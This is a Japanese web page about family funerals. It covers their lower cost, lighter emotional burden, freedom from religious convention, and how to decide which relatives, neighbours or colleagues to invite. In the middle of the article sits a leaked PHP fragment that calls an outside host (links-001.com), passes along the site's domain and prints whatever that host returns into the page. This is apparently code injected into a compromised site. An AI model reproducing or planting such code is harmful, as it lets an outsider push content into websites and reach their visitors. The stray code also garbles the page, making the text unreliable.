前へ
次へ

自由度がとても高いのも家族葬の特徴

これまでの伝統や宗教などを重んじでお葬式は行われてきましたが、比較的自由に決めることができるのも家族

more

家族葬は費用を抑える葬儀に向いている

家族葬を選ぶ人の中には大規模な葬儀を選ばないということがあります。
参列者が多くなればなるほど

more

家族葬に参列しようとする人もいます

家族葬に家族以外は参列はどうするのか、ということがあります。
名前の通り家族葬なわけですから基

more

家族葬を選ぶメリットを知る

葬儀にも様々なスタイルがありますが、最近はより小規模な葬儀を選ぶ家庭も増えてきました。
特に家族葬は現在ではかなり一般的な存在です。
家族はもちろん、ごく親しい親族や友人のみで行われるもので葬儀そのものは一般葬と同じように行われることが多くなっています。
こうした方法を選ぶメリットとしては、まず費用の負担が少ないということがあげられます。
大勢が参加する大規模な一般葬となると多くの費用が発生することになりますが、参加人数の少ない家族葬ならかなり出費を抑えることができます。
大勢の参列者への対応となると、精神的な負担も少なくありませんが、少人数で気心の知れた人たちばかりが集まる葬儀なら、精神面の負担も抑えられます。
故人とのお別れの時間をよりゆっくりと取れることも選ばれる理由です。
小規模でも心のこもった式にしたいという場合にぴったりといえるでしょう。
宗教儀式にとらわれずに自由な葬儀ができるのも小規模な葬儀ならではです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

家族葬には多くのメリットもありますが、実際に行う際には注意も必要です。
親族を呼ぶ際もどのあたりまでを呼ぶのかもよく考えておきたいところです。
式に呼ばない場合も電話などで訃報を伝える際も家族葬を行うことや、会葬を辞退するということはきちんと伝えておきたいところです。
近所の親しい人や会社関係の人を呼ぶのかでも悩む場合もありますが、あまりに多くの人を呼ぶと一般葬と変わらなくなりますので注意が必要です。
一般的には近所の人や会社関係の人は呼ばずに家族や親族のみで送ることとなります。
小規模な葬儀の場合も様々なプランがありますので、予算に合わせて最適なプランを選んでいきましょう。
費用を抑えたい場合はスタンダードなプランが向いていますし、より費用を掛けるのであれば料理や返礼品にこだわれるプランもあります。
良い式にするためには葬儀社選びも重要となりますので、急な際も焦らずに信頼できる業者を選んでいきましょう。

Page Top